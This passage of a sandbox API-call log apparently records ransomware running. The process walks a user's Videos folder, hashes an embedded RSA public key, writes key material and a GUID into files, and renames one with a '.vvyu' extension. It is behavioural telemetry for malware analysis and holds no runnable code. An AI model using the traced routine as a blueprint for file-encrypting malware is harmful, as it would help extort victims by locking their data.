hFile=0x584, liDistanceToMove=0x16217, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.941] WriteFile (in: hFile=0x584, lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0195.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0195.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0195.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.943] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0195.944] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.944] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.944] CloseHandle (hObject=0x584) returned 1 [0195.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0195.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af3f88 [0195.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0195.948] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\ixnsaF850.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\cvfgvyfl7tfjuo7\\ixnsaf850.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\ixnsaF850.swf.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\cvfgvyfl7tfjuo7\\ixnsaf850.swf.vvyu")) returned 1 [0195.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.957] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0195.961] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42d50dc0, ftCreationTime.dwHighDateTime=0x1d8a5cc, ftLastAccessTime.dwLowDateTime=0x1d1bd4c0, ftLastAccessTime.dwHighDateTime=0x1d8a738, ftLastWriteTime.dwLowDateTime=0x1d1bd4c0, ftLastWriteTime.dwHighDateTime=0x1d8a738, nFileSizeHigh=0x0, nFileSizeLow=0x8f3d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="L59EH_1g_s_fJjq.mp4", cAlternateFileName="L59EH_~1.MP4")) returned 1 [0195.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2adfe08 [0195.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.962] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\L59EH_1g_s_fJjq.mp4") returned=".mp4" [0195.962] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\L59EH_1g_s_fJjq.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\cvfgvyfl7tfjuo7\\l59eh_1g_s_fjjq.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0195.963] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=36669) returned 1 [0195.963] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0195.966] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x8f17, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.966] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.968] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.968] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x8f3d, lpOverlapped=0x0) returned 1 [0195.969] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0195.969] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.969] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.969] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0195.970] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0195.970] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.971] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0195.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0195.971] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0195.971] GetLastError () returned 0x0 [0195.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0195.971] GetLastError () returned 0x0 [0195.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0195.971] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0195.971] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0195.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0195.972] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0195.972] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0195.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0195.972] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0195.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8f40) returned 0x2af5168 [0195.972] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0195.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0195.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0195.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0195.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0195.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea020 [0195.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64e8 [0195.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea068 [0195.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6500 [0195.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6530 [0195.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6590 [0195.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6548 [0195.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0195.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0195.973] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0195.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0195.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6530 | out: hHeap=0x2c0000) returned 1 [0195.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6548 | out: hHeap=0x2c0000) returned 1 [0195.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6590 | out: hHeap=0x2c0000) returned 1 [0195.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0195.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0195.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6590 [0195.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0195.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6548 [0195.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0195.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6530 [0195.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0195.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0195.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0195.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0195.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0195.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0195.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0195.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0195.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6548 | out: hHeap=0x2c0000) returned 1 [0195.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0195.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6530 | out: hHeap=0x2c0000) returned 1 [0195.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0195.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0195.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6590 | out: hHeap=0x2c0000) returned 1 [0195.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0195.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0195.977] GetCurrentThreadId () returned 0x5d8 [0195.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0195.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae8898 [0195.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0195.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0195.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0195.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0195.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0195.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0195.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.977] GetCurrentThreadId () returned 0x5d8 [0195.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0195.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0195.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0195.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0195.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0195.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0195.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0195.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6590 [0195.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0195.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0195.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0195.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0195.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0195.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0195.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0195.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6530 [0195.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0195.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0195.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0195.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0195.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0195.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0195.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6548 [0195.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0195.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0195.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0195.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6518 [0195.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0195.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae65a8 [0195.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0195.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6578 [0195.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6560 [0195.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0195.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae65c0 [0195.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6560 | out: hHeap=0x2c0000) returned 1 [0195.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6560 [0195.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6578 | out: hHeap=0x2c0000) returned 1 [0195.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0195.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0195.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0195.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0195.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0195.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6530 | out: hHeap=0x2c0000) returned 1 [0195.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6530 [0195.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0195.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0195.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6590 | out: hHeap=0x2c0000) returned 1 [0195.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0195.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65c0 | out: hHeap=0x2c0000) returned 1 [0195.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0195.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0195.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0195.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0195.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6530 | out: hHeap=0x2c0000) returned 1 [0195.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0195.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0195.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0195.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0195.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0195.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0195.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0195.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0195.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0195.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0195.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0195.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0195.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6560 | 